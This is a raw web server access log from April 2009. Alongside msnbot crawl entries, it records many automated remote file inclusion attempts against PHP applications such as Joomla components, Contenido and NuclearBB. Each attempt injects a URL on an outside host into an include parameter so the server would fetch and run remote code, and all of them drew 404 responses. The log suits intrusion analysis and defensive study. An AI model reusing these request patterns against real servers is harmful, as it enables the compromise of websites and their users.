65.55.208.137 - - [08/Apr/2009:19:01:26 -0500] "GET /logs/access_log.1142380800 HTTP/1.1" 200 9223 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [08/Apr/2009:19:02:07 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 200 331 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [08/Apr/2009:19:02:07 -0500] "GET /logs/access_log.1114214400 HTTP/1.1" 200 332 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [08/Apr/2009:19:02:07 -0500] "GET /logs/access_log.1180656000 HTTP/1.1" 200 3484 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [08/Apr/2009:19:02:07 -0500] "GET /logs/access_log.1169942400 HTTP/1.1" 200 10170 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [08/Apr/2009:19:02:08 -0500] "GET /logs/access_log.1206662400 HTTP/1.1" 200 512 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [08/Apr/2009:19:03:41 -0500] "GET /logs/access_log.1147651200 HTTP/1.1" 200 962 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [08/Apr/2009:19:06:42 -0500] "GET /logs/access_log.1234310400 HTTP/1.1" 200 114287 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
125.244.77.2 - - [08/Apr/2009:19:20:53 -0500] "GET /logs/oomla/index.php?option=com_restaurante&task=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.817"
125.244.77.2 - - [08/Apr/2009:19:20:54 -0500] "GET /oomla/index.php?option=com_restaurante&task=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.817"
218.27.203.107 - - [08/Apr/2009:19:27:52 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:27:52 -0500] "GET /errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:27:52 -0500] "GET /logs/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:28:00 -0500] "GET /logs/access_log.1232236800/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:28:11 -0500] "GET /logs/access_log.1230681600/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:29:04 -0500] "GET /errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:29:04 -0500] "GET /logs/access_log.1232236800/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:29:05 -0500] "GET /logs/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:29:11 -0500] "GET /logs/access_log.1234396800/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:29:17 -0500] "GET /logs/access_log.1230681600/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [08/Apr/2009:19:30:57 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.244.77.2 - - [08/Apr/2009:19:33:46 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.817"
125.244.77.2 - - [08/Apr/2009:19:33:47 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.817"
67.15.48.29 - - [08/Apr/2009:19:35:28 -0500] "GET /logs/access_log.1236988800/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:19:35:28 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:19:35:28 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:19:36:08 -0500] "GET /logs/access_log.1237075200/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.55.208.133 - - [08/Apr/2009:19:47:50 -0500] "GET /logs/access_log.1203206400 HTTP/1.1" 200 1218 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [08/Apr/2009:19:47:50 -0500] "GET /logs/access_log.1117756800 HTTP/1.1" 200 6330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.205.102.239 - - [08/Apr/2009:20:22:25 -0500] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:20:22:25 -0500] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:20:22:25 -0500] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:20:22:25 -0500] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.813"
65.55.208.137 - - [08/Apr/2009:20:24:45 -0500] "GET /logs/access_log.1186617600 HTTP/1.1" 200 791 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.165.244.10 - - [08/Apr/2009:20:29:52 -0500] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:20:29:52 -0500] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:20:29:52 -0500] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:20:29:52 -0500] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
67.205.102.239 - - [08/Apr/2009:20:30:08 -0500] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.205.102.239 - - [08/Apr/2009:20:30:09 -0500] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.205.102.239 - - [08/Apr/2009:20:30:09 -0500] "GET /logs/access_log.1233619200/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.205.102.239 - - [08/Apr/2009:20:30:17 -0500] "GET /logs/access_log.1233705600/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:20:30:29 -0500] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:20:30:29 -0500] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:20:30:29 -0500] "GET /logs/access_log.1233619200/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:20:30:34 -0500] "GET /logs/access_log.1233705600/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:20:30:42 -0500] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:20:30:42 -0500] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:20:30:42 -0500] "GET /logs/access_log.1233619200/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.15.48.29 - - [08/Apr/2009:20:30:47 -0500] "GET /logs/access_log.1233705600/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
92.241.176.89 - - [08/Apr/2009:20:31:42 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
92.241.176.89 - - [08/Apr/2009:20:31:42 -0500] "GET /logs/access_log.1237334400/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
92.241.176.89 - - [08/Apr/2009:20:31:42 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
206.221.215.41 - - [08/Apr/2009:20:31:51 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
206.221.215.41 - - [08/Apr/2009:20:31:51 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
206.221.215.41 - - [08/Apr/2009:20:31:51 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
206.221.215.41 - - [08/Apr/2009:20:31:51 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:20:32:33 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:20:32:38 -0500] "GET /logs/access_log.1237334400/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:20:32:38 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.67.244.130 - - [08/Apr/2009:20:32:46 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
216.67.244.130 - - [08/Apr/2009:20:32:46 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
216.67.244.130 - - [08/Apr/2009:20:32:46 -0500] "GET /logs/access_log.1237248000//bbs//skin/zero_vote/ask_password.php?dir=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.55.208.131 - - [08/Apr/2009:20:32:49 -0500] "GET /logs/access_log.1133222400 HTTP/1.1" 200 330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.9.74.150 - - [08/Apr/2009:20:33:18 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:20:33:18 -0500] "GET /logs/access_log.1237334400/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:20:33:18 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
200.85.128.9 - - [08/Apr/2009:20:36:10 -0500] "GET /logs/access_log.1237248000//bbs//skin/zero_vote/ask_password.php?dir=http://hitek-ua.com///administrator/components/com_virtuemart/gefel.txt? HTTP/1.1" 404 347 "-""Mozilla/4.61 [en] (OS/2; U)"
200.85.128.9 - - [08/Apr/2009:20:36:10 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://hitek-ua.com///administrator/components/com_virtuemart/gefel.txt? HTTP/1.1" 404 325 "-""Mozilla/4.61 [en] (OS/2; U)"
200.85.128.9 - - [08/Apr/2009:20:36:10 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://hitek-ua.com///administrator/components/com_virtuemart/gefel.txt? HTTP/1.1" 404 320 "-""Mozilla/4.61 [en] (OS/2; U)"
203.22.204.193 - - [08/Apr/2009:20:36:45 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
203.22.204.193 - - [08/Apr/2009:20:36:45 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
203.22.204.193 - - [08/Apr/2009:20:36:56 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
203.22.204.193 - - [08/Apr/2009:20:36:56 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
83.208.211.167 - - [08/Apr/2009:20:39:03 -0500] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
213.180.63.226 - - [08/Apr/2009:20:39:03 -0500] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
65.55.208.136 - - [08/Apr/2009:20:40:46 -0500] "GET /logs/access_log.1160784000 HTTP/1.1" 200 2839 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [08/Apr/2009:20:40:47 -0500] "GET /logs/access_log.1111795200 HTTP/1.1" 200 678 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.17.10.239 - - [08/Apr/2009:20:55:35 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.17.10.239 - - [08/Apr/2009:20:55:35 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
85.17.10.239 - - [08/Apr/2009:20:55:44 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.17.10.239 - - [08/Apr/2009:20:55:44 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
85.17.10.239 - - [08/Apr/2009:20:55:44 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.17.10.239 - - [08/Apr/2009:20:55:44 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
85.17.10.239 - - [08/Apr/2009:20:55:53 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.17.10.239 - - [08/Apr/2009:20:55:54 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
200.162.171.247 - - [08/Apr/2009:20:59:23 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
200.162.171.247 - - [08/Apr/2009:20:59:23 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.162.171.247 - - [08/Apr/2009:20:59:23 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.55.208.144 - - [08/Apr/2009:20:59:51 -0500] "GET /_vti_cnf/?D=D HTTP/1.1" 200 676 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.162.171.247 - - [08/Apr/2009:21:00:49 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.205.102.239 - - [08/Apr/2009:21:21:17 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:21:21:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.813"
206.210.96.34 - - [08/Apr/2009:21:22:07 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
206.210.96.34 - - [08/Apr/2009:21:22:07 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.221.130.5 - - [08/Apr/2009:21:22:24 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:22:25 -0500] "GET /logs/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:22:25 -0500] "GET /main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:22:33 -0500] "GET /logs/access_log.1232323200/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.210.96.34 - - [08/Apr/2009:21:22:44 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
206.210.96.34 - - [08/Apr/2009:21:22:44 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.221.130.5 - - [08/Apr/2009:21:22:45 -0500] "GET /main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:22:45 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:22:45 -0500] "GET /logs/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.205.102.239 - - [08/Apr/2009:21:22:52 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:21:22:53 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.813"
77.221.130.5 - - [08/Apr/2009:21:22:56 -0500] "GET /logs/access_log.1232323200/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:38 -0500] "GET /main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:38 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:41 -0500] "GET /logs/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:43 -0500] "GET /logs/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:43 -0500] "GET /main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:43 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:46 -0500] "GET /logs/access_log.1232323200/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:47 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:47 -0500] "GET /main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:47 -0500] "GET /logs/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:23:57 -0500] "GET /logs/access_log.1232323200/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:24:00 -0500] "GET /logs/access_log.1232323200/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:24:27 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:24:27 -0500] "GET /main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:24:27 -0500] "GET /logs/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.5 - - [08/Apr/2009:21:24:36 -0500] "GET /logs/access_log.1232323200/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.205.102.239 - - [08/Apr/2009:21:26:20 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:21:26:20 -0500] "GET /lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
202.165.244.10 - - [08/Apr/2009:21:31:00 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:21:31:00 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:21:31:01 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:21:31:01 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
83.208.211.167 - - [08/Apr/2009:21:31:43 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
213.180.63.226 - - [08/Apr/2009:21:31:43 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.812"
